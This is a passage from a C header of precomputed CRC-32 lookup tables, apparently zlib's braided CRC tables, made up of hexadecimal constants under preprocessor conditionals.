0xbd9633d2, 0x208cdbe3, 0x9487ac45, 0x1ab90b80, 0xaeb27c26, 0x33a89417, 0x87a3e3b1, 0xa04f7520, 0x14440286, 0x895eeab7, 0x3d559d11, 0xb36b3ad4, 0x07604d72, 0x9a7aa543, 0x2e71d2e5, 0xc7019a13, 0x730aedb5, 0xee100584, 0x5a1b7222, 0xd425d5e7, 0x602ea241, 0xfd344a70, 0x493f3dd6, 0x8b9f1dcc, 0x3f946a6a, 0xa28e825b, 0x1685f5fd, 0x98bb5238, 0x2cb0259e, 0xb1aacdaf, 0x05a1ba09, 0xecd1f2ff, 0x58da8559, 0xc5c06d68, 0x71cb1ace, 0xfff5bd0b, 0x4bfecaad, 0xd6e4229c, 0x62ef553a, 0x4503c3ab, 0xf108b40d, 0x6c125c3c, 0xd8192b9a, 0x56278c5f, 0xe22cfbf9, 0x7f3613c8, 0xcb3d646e, 0x224d2c98, 0x96465b3e, 0x0b5cb30f, 0xbf57c4a9, 0x3169636c, 0x856214ca, 0x1878fcfb, 0xac738b5d, 0x17a6a003, 0xa3add7a5, 0x3eb73f94, 0x8abc4832, 0x0482eff7, 0xb0899851, 0x2d937060, 0x999807c6, 0x70e84f30, 0xc4e33896, 0x59f9d0a7, 0xedf2a701, 0x63cc00c4, 0xd7c77762, 0x4add9f53, 0xfed6e8f5, 0xd93a7e64, 0x6d3109c2, 0xf02be1f3, 0x44209655, 0xca1e3190, 0x7e154636, 0xe30fae07, 0x5704d9a1, 0xbe749157, 0x0a7fe6f1, 0x97650ec0, 
0x236e7966, 0xad50dea3, 0x195ba905, 0x84414134, 0x304a3692}, {0x00000000, 0x9e00aacc, 0x7d072542, 0xe3078f8e, 0xfa0e4a84, 0x640ee048, 0x87096fc6, 0x1909c50a, 0xb51be5d3, 0x2b1b4f1f, 0xc81cc091, 0x561c6a5d, 0x4f15af57, 0xd115059b, 0x32128a15, 0xac1220d9, 0x2b31bb7c, 0xb53111b0, 0x56369e3e, 0xc83634f2, 0xd13ff1f8, 0x4f3f5b34, 0xac38d4ba, 0x32387e76, 0x9e2a5eaf, 0x002af463, 0xe32d7bed, 0x7d2dd121, 0x6424142b, 0xfa24bee7, 0x19233169, 0x87239ba5, 0x566276f9, 0xc862dc35, 0x2b6553bb, 0xb565f977, 0xac6c3c7d, 0x326c96b1, 0xd16b193f, 0x4f6bb3f3, 0xe379932a, 0x7d7939e6, 0x9e7eb668, 0x007e1ca4, 0x1977d9ae, 0x87777362, 0x6470fcec, 0xfa705620, 0x7d53cd85, 0xe3536749, 0x0054e8c7, 0x9e54420b, 0x875d8701, 0x195d2dcd, 0xfa5aa243, 0x645a088f, 0xc8482856, 0x5648829a, 0xb54f0d14, 0x2b4fa7d8, 0x324662d2, 0xac46c81e, 0x4f414790, 0xd141ed5c, 0xedc29d29, 0x73c237e5, 0x90c5b86b, 0x0ec512a7, 0x17ccd7ad, 0x89cc7d61, 0x6acbf2ef, 0xf4cb5823, 0x58d978fa, 0xc6d9d236, 0x25de5db8, 0xbbdef774, 0xa2d7327e, 0x3cd798b2, 0xdfd0173c, 0x41d0bdf0, 0xc6f32655, 0x58f38c99, 0xbbf40317, 0x25f4a9db, 0x3cfd6cd1, 0xa2fdc61d, 0x41fa4993, 0xdffae35f, 0x73e8c386, 0xede8694a, 0x0eefe6c4, 0x90ef4c08, 0x89e68902, 0x17e623ce, 0xf4e1ac40, 0x6ae1068c, 0xbba0ebd0, 0x25a0411c, 0xc6a7ce92, 0x58a7645e, 0x41aea154, 0xdfae0b98, 0x3ca98416, 0xa2a92eda, 0x0ebb0e03, 0x90bba4cf, 0x73bc2b41, 0xedbc818d, 0xf4b54487, 0x6ab5ee4b, 0x89b261c5, 0x17b2cb09, 0x909150ac, 0x0e91fa60, 0xed9675ee, 0x7396df22, 0x6a9f1a28, 0xf49fb0e4, 0x17983f6a, 0x899895a6, 0x258ab57f, 0xbb8a1fb3, 0x588d903d, 0xc68d3af1, 0xdf84fffb, 0x41845537, 0xa283dab9, 0x3c837075, 0xda853b53, 0x4485919f, 0xa7821e11, 0x3982b4dd, 0x208b71d7, 0xbe8bdb1b, 0x5d8c5495, 0xc38cfe59, 0x6f9ede80, 0xf19e744c, 0x1299fbc2, 0x8c99510e, 0x95909404, 0x0b903ec8, 0xe897b146, 0x76971b8a, 0xf1b4802f, 0x6fb42ae3, 0x8cb3a56d, 0x12b30fa1, 0x0bbacaab, 0x95ba6067, 0x76bdefe9, 0xe8bd4525, 0x44af65fc, 0xdaafcf30, 0x39a840be, 0xa7a8ea72, 0xbea12f78, 0x20a185b4, 0xc3a60a3a, 0x5da6a0f6, 0x8ce74daa, 
0x12e7e766, 0xf1e068e8, 0x6fe0c224, 0x76e9072e, 0xe8e9ade2, 0x0bee226c, 0x95ee88a0, 0x39fca879, 0xa7fc02b5, 0x44fb8d3b, 0xdafb27f7, 0xc3f2e2fd, 0x5df24831, 0xbef5c7bf, 0x20f56d73, 0xa7d6f6d6, 0x39d65c1a, 0xdad1d394, 0x44d17958, 0x5dd8bc52, 0xc3d8169e, 0x20df9910, 0xbedf33dc, 0x12cd1305, 0x8ccdb9c9, 0x6fca3647, 0xf1ca9c8b, 0xe8c35981, 0x76c3f34d, 0x95c47cc3, 0x0bc4d60f, 0x3747a67a, 0xa9470cb6, 0x4a408338, 0xd44029f4, 0xcd49ecfe, 0x53494632, 0xb04ec9bc, 0x2e4e6370, 0x825c43a9, 0x1c5ce965, 0xff5b66eb, 0x615bcc27, 0x7852092d, 0xe652a3e1, 0x05552c6f, 0x9b5586a3, 0x1c761d06, 0x8276b7ca, 0x61713844, 0xff719288, 0xe6785782, 0x7878fd4e, 0x9b7f72c0, 0x057fd80c, 0xa96df8d5, 0x376d5219, 0xd46add97, 0x4a6a775b, 0x5363b251, 0xcd63189d, 0x2e649713, 0xb0643ddf, 0x6125d083, 0xff257a4f, 0x1c22f5c1, 0x82225f0d, 0x9b2b9a07, 0x052b30cb, 0xe62cbf45, 0x782c1589, 0xd43e3550, 0x4a3e9f9c, 0xa9391012, 0x3739bade, 0x2e307fd4, 0xb030d518, 0x53375a96, 0xcd37f05a, 0x4a146bff, 0xd414c133, 0x37134ebd, 0xa913e471, 0xb01a217b, 0x2e1a8bb7, 0xcd1d0439, 0x531daef5, 0xff0f8e2c, 0x610f24e0, 0x8208ab6e, 0x1c0801a2, 0x0501c4a8, 0x9b016e64, 0x7806e1ea, 0xe6064b26}}; #endif #endif #if N == 3 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x81256527, 0xd93bcc0f, 0x581ea928, 0x69069e5f, 0xe823fb78, 0xb03d5250, 0x31183777, 0xd20d3cbe, 0x53285999, 0x0b36f0b1, 0x8a139596, 0xbb0ba2e1, 0x3a2ec7c6, 0x62306eee, 0xe3150bc9, 0x7f6b7f3d, 0xfe4e1a1a, 0xa650b332, 0x2775d615, 0x166de162, 0x97488445, 0xcf562d6d, 0x4e73484a, 0xad664383, 0x2c4326a4, 0x745d8f8c, 0xf578eaab, 0xc460dddc, 0x4545b8fb, 0x1d5b11d3, 0x9c7e74f4, 0xfed6fe7a, 0x7ff39b5d, 0x27ed3275, 0xa6c85752, 0x97d06025, 0x16f50502, 0x4eebac2a, 0xcfcec90d, 0x2cdbc2c4, 0xadfea7e3, 0xf5e00ecb, 0x74c56bec, 0x45dd5c9b, 0xc4f839bc, 0x9ce69094, 0x1dc3f5b3, 0x81bd8147, 0x0098e460, 0x58864d48, 0xd9a3286f, 0xe8bb1f18, 0x699e7a3f, 0x3180d317, 0xb0a5b630, 0x53b0bdf9, 0xd295d8de, 0x8a8b71f6, 0x0bae14d1, 0x3ab623a6, 0xbb934681, 0xe38defa9, 0x62a88a8e, 
0x26dcfab5, 0xa7f99f92, 0xffe736ba, 0x7ec2539d, 0x4fda64ea, 0xceff01cd, 0x96e1a8e5, 0x17c4cdc2, 0xf4d1c60b, 0x75f4a32c, 0x2dea0a04, 0xaccf6f23, 0x9dd75854, 0x1cf23d73, 0x44ec945b, 0xc5c9f17c, 0x59b78588, 0xd892e0af, 0x808c4987, 0x01a92ca0, 0x30b11bd7, 0xb1947ef0, 0xe98ad7d8, 0x68afb2ff, 0x8bbab936, 0x0a9fdc11, 0x52817539, 0xd3a4101e, 0xe2bc2769, 0x6399424e, 0x3b87eb66, 0xbaa28e41, 0xd80a04cf, 0x592f61e8, 0x0131c8c0, 0x8014ade7, 0xb10c9a90, 0x3029ffb7, 0x6837569f, 0xe91233b8, 0x0a073871, 0x8b225d56, 0xd33cf47e, 0x52199159, 0x6301a62e, 0xe224c309, 0xba3a6a21, 0x3b1f0f06, 0xa7617bf2, 0x26441ed5, 0x7e5ab7fd, 0xff7fd2da, 0xce67e5ad, 0x4f42808a, 0x175c29a2, 0x96794c85, 0x756c474c, 0xf449226b, 0xac578b43, 0x2d72ee64, 0x1c6ad913, 0x9d4fbc34, 0xc551151c, 0x4474703b, 0x4db9f56a, 0xcc9c904d, 0x94823965, 0x15a75c42, 0x24bf6b35, 0xa59a0e12, 0xfd84a73a, 0x7ca1c21d, 0x9fb4c9d4, 0x1e91acf3, 0x468f05db, 0xc7aa60fc, 0xf6b2578b, 0x779732ac, 0x2f899b84, 0xaeacfea3, 0x32d28a57, 0xb3f7ef70, 0xebe94658, 0x6acc237f, 0x5bd41408, 0xdaf1712f, 0x82efd807, 0x03cabd20, 0xe0dfb6e9, 0x61fad3ce, 0x39e47ae6, 0xb8c11fc1, 0x89d928b6, 0x08fc4d91, 0x50e2e4b9, 0xd1c7819e, 0xb36f0b10, 0x324a6e37, 0x6a54c71f, 0xeb71a238, 0xda69954f, 0x5b4cf068, 0x03525940, 0x82773c67, 0x616237ae, 0xe0475289, 0xb859fba1, 0x397c9e86, 0x0864a9f1, 0x8941ccd6, 0xd15f65fe, 0x507a00d9, 0xcc04742d, 0x4d21110a, 0x153fb822, 0x941add05, 0xa502ea72, 0x24278f55, 0x7c39267d, 0xfd1c435a, 0x1e094893, 0x9f2c2db4, 0xc732849c, 0x4617e1bb, 0x770fd6cc, 0xf62ab3eb, 0xae341ac3, 0x2f117fe4, 0x6b650fdf, 0xea406af8, 0xb25ec3d0, 0x337ba6f7, 0x02639180, 0x8346f4a7, 0xdb585d8f, 0x5a7d38a8, 0xb9683361, 0x384d5646, 0x6053ff6e, 0xe1769a49, 0xd06ead3e, 0x514bc819, 0x09556131, 0x88700416, 0x140e70e2, 0x952b15c5, 0xcd35bced, 0x4c10d9ca, 0x7d08eebd, 0xfc2d8b9a, 0xa43322b2, 0x25164795, 0xc6034c5c, 0x4726297b, 0x1f388053, 0x9e1de574, 0xaf05d203, 0x2e20b724, 0x763e1e0c, 0xf71b7b2b, 0x95b3f1a5, 0x14969482, 0x4c883daa, 0xcdad588d, 0xfcb56ffa, 0x7d900add, 
0x258ea3f5, 0xa4abc6d2, 0x47becd1b, 0xc69ba83c, 0x9e850114, 0x1fa06433, 0x2eb85344, 0xaf9d3663, 0xf7839f4b, 0x76a6fa6c, 0xead88e98, 0x6bfdebbf, 0x33e34297, 0xb2c627b0, 0x83de10c7, 0x02fb75e0, 0x5ae5dcc8, 0xdbc0b9ef, 0x38d5b226, 0xb9f0d701, 0xe1ee7e29, 0x60cb1b0e, 0x51d32c79, 0xd0f6495e, 0x88e8e076, 0x09cd8551}, {0x00000000, 0x9b73ead4, 0xed96d3e9, 0x76e5393d, 0x005ca193, 0x9b2f4b47, 0xedca727a, 0x76b998ae, 0x00b94326, 0x9bcaa9f2, 0xed2f90cf, 0x765c7a1b, 0x00e5e2b5, 0x9b960861, 0xed73315c, 0x7600db88, 0x0172864c, 0x9a016c98, 0xece455a5, 0x7797bf71, 0x012e27df, 0x9a5dcd0b, 0xecb8f436, 0x77cb1ee2, 0x01cbc56a, 0x9ab82fbe, 0xec5d1683, 0x772efc57, 0x019764f9, 0x9ae48e2d, 0xec01b710, 0x77725dc4, 0x02e50c98, 0x9996e64c, 0xef73df71, 0x740035a5, 0x02b9ad0b, 0x99ca47df, 0xef2f7ee2, 0x745c9436, 0x025c4fbe, 0x992fa56a, 0xefca9c57, 0x74b97683, 0x0200ee2d, 0x997304f9, 0xef963dc4, 0x74e5d710, 0x03978ad4, 0x98e46000, 0xee01593d, 0x7572b3e9, 0x03cb2b47, 0x98b8c193, 0xee5df8ae, 0x752e127a, 0x032ec9f2, 0x985d2326, 0xeeb81a1b, 0x75cbf0cf, 0x03726861, 0x980182b5, 0xeee4bb88, 0x7597515c, 0x05ca1930, 0x9eb9f3e4, 0xe85ccad9, 0x732f200d, 0x0596b8a3, 0x9ee55277, 0xe8006b4a, 0x7373819e, 0x05735a16, 0x9e00b0c2, 0xe8e589ff, 0x7396632b, 0x052ffb85, 0x9e5c1151, 0xe8b9286c, 0x73cac2b8, 0x04b89f7c, 0x9fcb75a8, 0xe92e4c95, 0x725da641, 0x04e43eef, 0x9f97d43b, 0xe972ed06, 0x720107d2, 0x0401dc5a, 0x9f72368e, 0xe9970fb3, 0x72e4e567, 0x045d7dc9, 0x9f2e971d, 0xe9cbae20, 0x72b844f4, 0x072f15a8, 0x9c5cff7c, 0xeab9c641, 0x71ca2c95, 0x0773b43b, 0x9c005eef, 0xeae567d2, 0x71968d06, 0x0796568e, 0x9ce5bc5a, 0xea008567, 0x71736fb3, 0x07caf71d, 0x9cb91dc9, 0xea5c24f4, 0x712fce20, 0x065d93e4, 0x9d2e7930, 0xebcb400d, 0x70b8aad9, 0x06013277, 0x9d72d8a3, 0xeb97e19e, 0x70e40b4a, 0x06e4d0c2, 0x9d973a16, 0xeb72032b, 0x7001e9ff, 0x06b87151, 0x9dcb9b85, 0xeb2ea2b8, 0x705d486c, 0x0b943260, 0x90e7d8b4, 0xe602e189, 0x7d710b5d, 0x0bc893f3, 0x90bb7927, 0xe65e401a, 0x7d2daace, 0x0b2d7146, 0x905e9b92, 0xe6bba2af, 0x7dc8487b, 
0x0b71d0d5, 0x90023a01, 0xe6e7033c, 0x7d94e9e8, 0x0ae6b42c, 0x91955ef8, 0xe77067c5, 0x7c038d11, 0x0aba15bf, 0x91c9ff6b, 0xe72cc656, 0x7c5f2c82, 0x0a5ff70a, 0x912c1dde, 0xe7c924e3, 0x7cbace37, 0x0a035699, 0x9170bc4d, 0xe7958570, 0x7ce66fa4, 0x09713ef8, 0x9202d42c, 0xe4e7ed11, 0x7f9407c5, 0x092d9f6b, 0x925e75bf, 0xe4bb4c82, 0x7fc8a656, 0x09c87dde, 0x92bb970a, 0xe45eae37, 0x7f2d44e3, 0x0994dc4d, 0x92e73699, 0xe4020fa4, 0x7f71e570, 0x0803b8b4, 0x93705260, 0xe5956b5d, 0x7ee68189, 0x085f1927, 0x932cf3f3, 0xe5c9cace, 0x7eba201a, 0x08bafb92, 0x93c91146, 0xe52c287b, 0x7e5fc2af, 0x08e65a01, 0x9395b0d5, 0xe57089e8, 0x7e03633c, 0x0e5e2b50, 0x952dc184, 0xe3c8f8b9, 0x78bb126d, 0x0e028ac3, 0x95716017, 0xe394592a, 0x78e7b3fe, 0x0ee76876, 0x959482a2, 0xe371bb9f, 0x7802514b, 0x0ebbc9e5, 0x95c82331, 0xe32d1a0c, 0x785ef0d8, 0x0f2cad1c, 0x945f47c8, 0xe2ba7ef5, 0x79c99421, 0x0f700c8f, 0x9403e65b, 0xe2e6df66, 0x799535b2, 0x0f95ee3a, 0x94e604ee, 0xe2033dd3, 0x7970d707, 0x0fc94fa9, 0x94baa57d, 0xe25f9c40, 0x792c7694, 0x0cbb27c8, 0x97c8cd1c, 0xe12df421, 0x7a5e1ef5, 0x0ce7865b, 0x97946c8f, 0xe17155b2, 0x7a02bf66, 0x0c0264ee, 0x97718e3a, 0xe194b707, 0x7ae75dd3, 0x0c5ec57d, 0x972d2fa9, 0xe1c81694, 0x7abbfc40, 0x0dc9a184, 0x96ba4b50, 0xe05f726d, 0x7b2c98b9, 0x0d950017, 0x96e6eac3, 0xe003d3fe, 0x7b70392a, 0x0d70e2a2, 0x96030876, 0xe0e6314b, 0x7b95db9f, 0x0d2c4331, 0x965fa9e5, 0xe0ba90d8, 0x7bc97a0c}, {0x00000000, 0x172864c0, 0x2e50c980, 0x3978ad40, 0x5ca19300, 0x4b89f7c0, 0x72f15a80, 0x65d93e40, 0xb9432600, 0xae6b42c0, 0x9713ef80, 0x803b8b40, 0xe5e2b500, 0xf2cad1c0, 0xcbb27c80, 0xdc9a1840, 0xa9f74a41, 0xbedf2e81, 0x87a783c1, 0x908fe701, 0xf556d941, 0xe27ebd81, 0xdb0610c1, 0xcc2e7401, 0x10b46c41, 0x079c0881, 0x3ee4a5c1, 0x29ccc101, 0x4c15ff41, 0x5b3d9b81, 0x624536c1, 0x756d5201, 0x889f92c3, 0x9fb7f603, 0xa6cf5b43, 0xb1e73f83, 0xd43e01c3, 0xc3166503, 0xfa6ec843, 0xed46ac83, 0x31dcb4c3, 0x26f4d003, 0x1f8c7d43, 0x08a41983, 0x6d7d27c3, 0x7a554303, 0x432dee43, 0x54058a83, 0x2168d882, 0x3640bc42, 
0x0f381102, 0x181075c2, 0x7dc94b82, 0x6ae12f42, 0x53998202, 0x44b1e6c2, 0x982bfe82, 0x8f039a42, 0xb67b3702, 0xa15353c2, 0xc48a6d82, 0xd3a20942, 0xeadaa402, 0xfdf2c0c2, 0xca4e23c7, 0xdd664707, 0xe41eea47, 0xf3368e87, 0x96efb0c7, 0x81c7d407, 0xb8bf7947, 0xaf971d87, 0x730d05c7, 0x64256107, 0x5d5dcc47, 0x4a75a887, 0x2fac96c7, 0x3884f207, 0x01fc5f47, 0x16d43b87, 0x63b96986, 0x74910d46, 0x4de9a006, 0x5ac1c4c6, 0x3f18fa86, 0x28309e46, 0x11483306, 0x066057c6, 0xdafa4f86, 0xcdd22b46, 0xf4aa8606, 0xe382e2c6, 0x865bdc86, 0x9173b846, 0xa80b1506, 0xbf2371c6, 0x42d1b104, 0x55f9d5c4, 0x6c817884, 0x7ba91c44, 0x1e702204, 0x095846c4, 0x3020eb84, 0x27088f44, 0xfb929704, 0xecbaf3c4, 0xd5c25e84, 0xc2ea3a44, 0xa7330404, 0xb01b60c4, 0x8963cd84, 0x9e4ba944, 0xeb26fb45, 0xfc0e9f85, 0xc57632c5, 0xd25e5605, 0xb7876845, 0xa0af0c85, 0x99d7a1c5, 0x8effc505, 0x5265dd45, 0x454db985, 0x7c3514c5, 0x6b1d7005, 0x0ec44e45, 0x19ec2a85, 0x209487c5, 0x37bce305, 0x4fed41cf, 0x58c5250f, 0x61bd884f, 0x7695ec8f, 0x134cd2cf, 0x0464b60f, 0x3d1c1b4f, 0x2a347f8f, 0xf6ae67cf, 0xe186030f, 0xd8feae4f, 0xcfd6ca8f, 0xaa0ff4cf, 0xbd27900f, 0x845f3d4f, 0x9377598f, 0xe61a0b8e, 0xf1326f4e, 0xc84ac20e, 0xdf62a6ce, 0xbabb988e, 0xad93fc4e, 0x94eb510e, 0x83c335ce, 0x5f592d8e, 0x4871494e, 0x7109e40e, 0x662180ce, 0x03f8be8e, 0x14d0da4e, 0x2da8770e, 0x3a8013ce, 0xc772d30c, 0xd05ab7cc, 0xe9221a8c, 0xfe0a7e4c, 0x9bd3400c, 0x8cfb24cc, 0xb583898c, 0xa2abed4c, 0x7e31f50c, 0x691991cc, 0x50613c8c, 0x4749584c, 0x2290660c, 0x35b802cc, 0x0cc0af8c, 0x1be8cb4c, 0x6e85994d, 0x79adfd8d, 0x40d550cd, 0x57fd340d, 0x32240a4d, 0x250c6e8d, 0x1c74c3cd, 0x0b5ca70d, 0xd7c6bf4d, 0xc0eedb8d, 0xf99676cd, 0xeebe120d, 0x8b672c4d, 0x9c4f488d, 0xa537e5cd, 0xb21f810d, 0x85a36208, 0x928b06c8, 0xabf3ab88, 0xbcdbcf48, 0xd902f108, 0xce2a95c8, 0xf7523888, 0xe07a5c48, 0x3ce04408, 0x2bc820c8, 0x12b08d88, 0x0598e948, 0x6041d708, 0x7769b3c8, 0x4e111e88, 0x59397a48, 0x2c542849, 0x3b7c4c89, 0x0204e1c9, 0x152c8509, 0x70f5bb49, 0x67dddf89, 0x5ea572c9, 0x498d1609, 
0x95170e49, 0x823f6a89, 0xbb47c7c9, 0xac6fa309, 0xc9b69d49, 0xde9ef989, 0xe7e654c9, 0xf0ce3009, 0x0d3cf0cb, 0x1a14940b, 0x236c394b, 0x34445d8b, 0x519d63cb, 0x46b5070b, 0x7fcdaa4b, 0x68e5ce8b, 0xb47fd6cb, 0xa357b20b, 0x9a2f1f4b, 0x8d077b8b, 0xe8de45cb, 0xfff6210b, 0xc68e8c4b, 0xd1a6e88b, 0xa4cbba8a, 0xb3e3de4a, 0x8a9b730a, 0x9db317ca, 0xf86a298a, 0xef424d4a, 0xd63ae00a, 0xc11284ca, 0x1d889c8a, 0x0aa0f84a, 0x33d8550a, 0x24f031ca, 0x41290f8a, 0x56016b4a, 0x6f79c60a, 0x7851a2ca}, {0x00000000, 0x9fda839e, 0xe4c4017d, 0x7b1e82e3, 0x12f904bb, 0x8d238725, 0xf63d05c6, 0x69e78658, 0x25f20976, 0xba288ae8, 0xc136080b, 0x5eec8b95, 0x370b0dcd, 0xa8d18e53, 0xd3cf0cb0, 0x4c158f2e, 0x4be412ec, 0xd43e9172, 0xaf201391, 0x30fa900f, 0x591d1657, 0xc6c795c9, 0xbdd9172a, 0x220394b4, 0x6e161b9a, 0xf1cc9804, 0x8ad21ae7, 0x15089979, 0x7cef1f21, 0xe3359cbf, 0x982b1e5c, 0x07f19dc2, 0x97c825d8, 0x0812a646, 0x730c24a5, 0xecd6a73b, 0x85312163, 0x1aeba2fd, 0x61f5201e, 0xfe2fa380, 0xb23a2cae, 0x2de0af30, 0x56fe2dd3, 0xc924ae4d, 0xa0c32815, 0x3f19ab8b, 0x44072968, 0xdbddaaf6, 0xdc2c3734, 0x43f6b4aa, 0x38e83649, 0xa732b5d7, 0xced5338f, 0x510fb011, 0x2a1132f2, 0xb5cbb16c, 0xf9de3e42, 0x6604bddc, 0x1d1a3f3f, 0x82c0bca1, 0xeb273af9, 0x74fdb967, 0x0fe33b84, 0x9039b81a, 0xf4e14df1, 0x6b3bce6f, 0x10254c8c, 0x8fffcf12, 0xe618494a, 0x79c2cad4, 0x02dc4837, 0x9d06cba9, 0xd1134487, 0x4ec9c719, 0x35d745fa, 0xaa0dc664, 0xc3ea403c, 0x5c30c3a2, 0x272e4141, 0xb8f4c2df, 0xbf055f1d, 0x20dfdc83, 0x5bc15e60, 0xc41bddfe, 0xadfc5ba6, 0x3226d838, 0x49385adb, 0xd6e2d945, 0x9af7566b, 0x052dd5f5, 0x7e335716, 0xe1e9d488, 0x880e52d0, 0x17d4d14e, 0x6cca53ad, 0xf310d033, 0x63296829, 0xfcf3ebb7, 0x87ed6954, 0x1837eaca, 0x71d06c92, 0xee0aef0c, 0x95146def, 0x0aceee71, 0x46db615f, 0xd901e2c1, 0xa21f6022, 0x3dc5e3bc, 0x542265e4, 0xcbf8e67a, 0xb0e66499, 0x2f3ce707, 0x28cd7ac5, 0xb717f95b, 0xcc097bb8, 0x53d3f826, 0x3a347e7e, 0xa5eefde0, 0xdef07f03, 0x412afc9d, 0x0d3f73b3, 0x92e5f02d, 0xe9fb72ce, 0x7621f150, 0x1fc67708, 0x801cf496, 
0xfb027675, 0x64d8f5eb, 0x32b39da3, 0xad691e3d, 0xd6779cde, 0x49ad1f40, 0x204a9918, 0xbf901a86, 0xc48e9865, 0x5b541bfb, 0x174194d5, 0x889b174b, 0xf38595a8, 0x6c5f1636, 0x05b8906e, 0x9a6213f0, 0xe17c9113, 0x7ea6128d, 0x79578f4f, 0xe68d0cd1, 0x9d938e32, 0x02490dac, 0x6bae8bf4, 0xf474086a, 0x8f6a8a89, 0x10b00917, 0x5ca58639, 0xc37f05a7, 0xb8618744, 0x27bb04da, 0x4e5c8282, 0xd186011c, 0xaa9883ff, 0x35420061, 0xa57bb87b, 0x3aa13be5, 0x41bfb906, 0xde653a98, 0xb782bcc0, 0x28583f5e, 0x5346bdbd, 0xcc9c3e23, 0x8089b10d, 0x1f533293, 0x644db070, 0xfb9733ee, 0x9270b5b6, 0x0daa3628, 0x76b4b4cb, 0xe96e3755, 0xee9faa97, 0x71452909, 0x0a5babea, 0x95812874, 0xfc66ae2c, 0x63bc2db2, 0x18a2af51, 0x87782ccf, 0xcb6da3e1, 0x54b7207f, 0x2fa9a29c, 0xb0732102, 0xd994a75a, 0x464e24c4, 0x3d50a627, 0xa28a25b9, 0xc652d052, 0x598853cc, 0x2296d12f, 0xbd4c52b1, 0xd4abd4e9, 0x4b715777, 0x306fd594, 0xafb5560a, 0xe3a0d924, 0x7c7a5aba, 0x0764d859, 0x98be5bc7, 0xf159dd9f, 0x6e835e01, 0x159ddce2, 0x8a475f7c, 0x8db6c2be, 0x126c4120, 0x6972c3c3, 0xf6a8405d, 0x9f4fc605, 0x0095459b, 0x7b8bc778, 0xe45144e6, 0xa844cbc8, 0x379e4856, 0x4c80cab5, 0xd35a492b, 0xbabdcf73, 0x25674ced, 0x5e79ce0e, 0xc1a34d90, 0x519af58a, 0xce407614, 0xb55ef4f7, 0x2a847769, 0x4363f131, 0xdcb972af, 0xa7a7f04c, 0x387d73d2, 0x7468fcfc, 0xebb27f62, 0x90acfd81, 0x0f767e1f, 0x6691f847, 0xf94b7bd9, 0x8255f93a, 0x1d8f7aa4, 0x1a7ee766, 0x85a464f8, 0xfebae61b, 0x61606585, 0x0887e3dd, 0x975d6043, 0xec43e2a0, 0x7399613e, 0x3f8cee10, 0xa0566d8e, 0xdb48ef6d, 0x44926cf3, 0x2d75eaab, 0xb2af6935, 0xc9b1ebd6, 0x566b6848}, {0x00000000, 0x65673b46, 0xcace768c, 0xafa94dca, 0x4eedeb59, 0x2b8ad01f, 0x84239dd5, 0xe144a693, 0x9ddbd6b2, 0xf8bcedf4, 0x5715a03e, 0x32729b78, 0xd3363deb, 0xb65106ad, 0x19f84b67, 0x7c9f7021, 0xe0c6ab25, 0x85a19063, 0x2a08dda9, 0x4f6fe6ef, 0xae2b407c, 0xcb4c7b3a, 0x64e536f0, 0x01820db6, 0x7d1d7d97, 0x187a46d1, 0xb7d30b1b, 0xd2b4305d, 0x33f096ce, 0x5697ad88, 0xf93ee042, 0x9c59db04, 0x1afc500b, 0x7f9b6b4d, 0xd0322687, 0xb5551dc1, 
0x5411bb52, 0x31768014, 0x9edfcdde, 0xfbb8f698, 0x872786b9, 0xe240bdff, 0x4de9f035, 0x288ecb73, 0xc9ca6de0, 0xacad56a6, 0x03041b6c, 0x6663202a, 0xfa3afb2e, 0x9f5dc068, 0x30f48da2, 0x5593b6e4, 0xb4d71077, 0xd1b02b31, 0x7e1966fb, 0x1b7e5dbd, 0x67e12d9c, 0x028616da, 0xad2f5b10, 0xc8486056, 0x290cc6c5, 0x4c6bfd83, 0xe3c2b049, 0x86a58b0f, 0x35f8a016, 0x509f9b50, 0xff36d69a, 0x9a51eddc, 0x7b154b4f, 0x1e727009, 0xb1db3dc3, 0xd4bc0685, 0xa82376a4, 0xcd444de2, 0x62ed0028, 0x078a3b6e, 0xe6ce9dfd, 0x83a9a6bb, 0x2c00eb71, 0x4967d037, 0xd53e0b33, 0xb0593075, 0x1ff07dbf, 0x7a9746f9, 0x9bd3e06a, 0xfeb4db2c, 0x511d96e6, 0x347aada0, 0x48e5dd81, 0x2d82e6c7, 0x822bab0d, 0xe74c904b, 0x060836d8, 0x636f0d9e, 0xccc64054, 0xa9a17b12, 0x2f04f01d, 0x4a63cb5b, 0xe5ca8691, 0x80adbdd7, 0x61e91b44, 0x048e2002, 0xab276dc8, 0xce40568e, 0xb2df26af, 0xd7b81de9, 0x78115023, 0x1d766b65, 0xfc32cdf6, 0x9955f6b0, 0x36fcbb7a, 0x539b803c, 0xcfc25b38, 0xaaa5607e, 0x050c2db4, 0x606b16f2, 0x812fb061, 0xe4488b27, 0x4be1c6ed, 0x2e86fdab, 0x52198d8a, 0x377eb6cc, 0x98d7fb06, 0xfdb0c040, 0x1cf466d3, 0x79935d95, 0xd63a105f, 0xb35d2b19, 0x6bf1402c, 0x0e967b6a, 0xa13f36a0, 0xc4580de6, 0x251cab75, 0x407b9033, 0xefd2ddf9, 0x8ab5e6bf, 0xf62a969e, 0x934dadd8, 0x3ce4e012, 0x5983db54, 0xb8c77dc7, 0xdda04681, 0x72090b4b, 0x176e300d, 0x8b37eb09, 0xee50d04f, 0x41f99d85, 0x249ea6c3, 0xc5da0050, 0xa0bd3b16, 0x0f1476dc, 0x6a734d9a, 0x16ec3dbb, 0x738b06fd, 0xdc224b37, 0xb9457071, 0x5801d6e2, 0x3d66eda4, 0x92cfa06e, 0xf7a89b28, 0x710d1027, 0x146a2b61, 0xbbc366ab, 0xdea45ded, 0x3fe0fb7e, 0x5a87c038, 0xf52e8df2, 0x9049b6b4, 0xecd6c695, 0x89b1fdd3, 0x2618b019, 0x437f8b5f, 0xa23b2dcc, 0xc75c168a, 0x68f55b40, 0x0d926006, 0x91cbbb02, 0xf4ac8044, 0x5b05cd8e, 0x3e62f6c8, 0xdf26505b, 0xba416b1d, 0x15e826d7, 0x708f1d91, 0x0c106db0, 0x697756f6, 0xc6de1b3c, 0xa3b9207a, 0x42fd86e9, 0x279abdaf, 0x8833f065, 0xed54cb23, 0x5e09e03a, 0x3b6edb7c, 0x94c796b6, 0xf1a0adf0, 0x10e40b63, 0x75833025, 0xda2a7def, 0xbf4d46a9, 0xc3d23688, 0xa6b50dce, 
